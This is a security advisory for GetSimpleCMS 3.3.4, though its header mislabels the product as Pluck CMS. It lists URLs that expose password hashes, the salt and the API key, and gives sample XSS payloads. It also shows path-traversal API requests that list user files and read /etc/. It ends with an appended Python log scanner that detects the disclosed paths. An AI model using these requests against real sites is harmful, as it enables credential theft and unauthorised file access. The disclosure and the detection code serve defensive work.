Pluck CMS:			http://get-simple.info/
Version:			3.3.4
By Ross Marks: 		http://www.rossmarks.co.uk
OSVDB Creditee:		http://osvdb.org/creditees/13991-ross-marks

1.	SHA1 password (and other sensitive information) disclosure
		If you know the name of a user, visit any of:
			http://website.com/GetSimpleCMS/data/users/<username>.xml <-- password
			http://website.com/GetSimpleCMS/backups/users/<username>.xml.bak <-- password
			http://website.com/GetSimpleCMS/data/other/authorization.xml <-- for salt 
			http://website.com/GetSimpleCMS/data/other/appid.xml <-- API key
			
2.	Persistent XSS (requires access)
		Title, Tags, Menu Text and Meta description are all vulnerable to XSS, e.g.
			"><script>alert(1);</script>
		Page content is also vulnerable: click the source button and edit it directly, e.g.
			<script>alert(1)</script>

3.	PHP code execution (requires access)
		Directly type PHP at:		http://website.com/GetSimpleCMS/admin/theme-edit.php
		
4.	Full Path Disclosure
		visit: http://website.com/GetSimpleCMS/plugins/anonymous_data.php to get:
			Fatal error: Call to undefined function i18n_merge() in /path/to/GetSimpleCMS/plugins/anonymous_data.php on line 14
		or http://website.com/GetSimpleCMS/plugins/InnovationPlugin.php to get:
			Notice: Use of undefined constant GSDATAOTHERPATH - assumed 'GSDATAOTHERPATH' in /path/to/GetSimpleCMS/plugins/InnovationPlugin.php on line 12

			Fatal error: Call to undefined function i18n_merge() in /path/to/GetSimpleCMS/plugins/InnovationPlugin.php on line 15

5. API Vulnerabilities
		Since the API key can be read (see 1), it is fairly trivial to exploit the site through the API.
		Here are some examples (all sent as POST data) to: http://website.com/GetSimpleCMS/admin/api.php
		
	1.	Discover usernames:
			data=<request>
				<key>ABC123456</key>
				<method>all_files_read</method>
				<data>
					<path>../../data/users/</path>
				</data>
			</request>
	
	2. Read user settings file (includes password hash)
			data=<request>
				<key>ABC123456</key>
				<method>page_read</method>
				<data>
					<slug>../../data/users/!!USERNAME!!</slug>
				</data>
			</request>
	
	3. Local file inclusion
			data=<request>
				<key>ABC123456</key>
				<method>all_files_read</method>
				<data>
					<path>../../../../../../etc/</path>
				</data>
			</request>
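
Added example (not part of the original advisory, and not GetSimpleCMS code): a log check for the direct requests described in items 1 and 4, reporting whether the server actually returned the file. It assumes a common/combined-format access log; the rule names, function names and sample lines are constructed for illustration.

```python
import re
from urllib.parse import unquote, urlsplit

# Paths the advisory lists as directly reachable (items 1 and 4).
RULES = [
    ("user-file", re.compile(r"/data/users/[^/]+\.xml$", re.I)),
    ("user-backup", re.compile(r"/backups/users/[^/]+\.xml\.bak$", re.I)),
    ("salt-file", re.compile(r"/data/other/authorization\.xml$", re.I)),
    ("api-key-file", re.compile(r"/data/other/appid\.xml$", re.I)),
    ("plugin-direct", re.compile(r"/plugins/[^/]+\.php$", re.I)),
]

# Assumed log layout: ip ident user [time] "METHOD target PROTO" status size
LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) ')

def classify(line):
    """Return a finding dict for one access-log line, or None."""
    m = LINE.match(line)
    if not m:
        return None
    ip, _method, target, status = m.groups()
    # Drop the query string and decode %xx so encoded dots still match.
    path = unquote(urlsplit(target).path)
    for rule, rx in RULES:
        if rx.search(path):
            # served=True: the file or the PHP error text reached the client.
            return {"ip": ip, "rule": rule, "path": path, "served": status == "200"}
    return None

def scan(lines):
    """Classify every line and keep only the findings."""
    return [hit for hit in map(classify, lines) if hit]

# Constructed sample lines (documentation IP ranges, made-up timestamp).
T = "[01/Jan/2024:00:00:00 +0000]"
SAMPLE_LOG = [
    f'203.0.113.7 - - {T} "GET /GetSimpleCMS/data/users/admin.xml HTTP/1.1" 200 512',
    f'203.0.113.7 - - {T} "GET /GetSimpleCMS/data/other/appid.xml HTTP/1.1" 403 199',
    f'198.51.100.4 - - {T} "GET /GetSimpleCMS/plugins/anonymous_data.php HTTP/1.1" 200 163',
    f'198.51.100.4 - - {T} "GET /GetSimpleCMS/index.php?id=about HTTP/1.1" 200 4096',
    f'203.0.113.7 - - {T} "GET /GetSimpleCMS/backups/users/admin.xml.bak?x=1 HTTP/1.1" 200 512',
    f'198.51.100.4 - - {T} "POST /GetSimpleCMS/admin/api.php HTTP/1.1" 200 87',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

A finding with `served` set to False means the web server refused the request, which is the state these data, backup and plugin paths should be in. The API requests in item 5 carry the traversal in the POST body, so an access log records only the hit on admin/api.php and this check does not flag them.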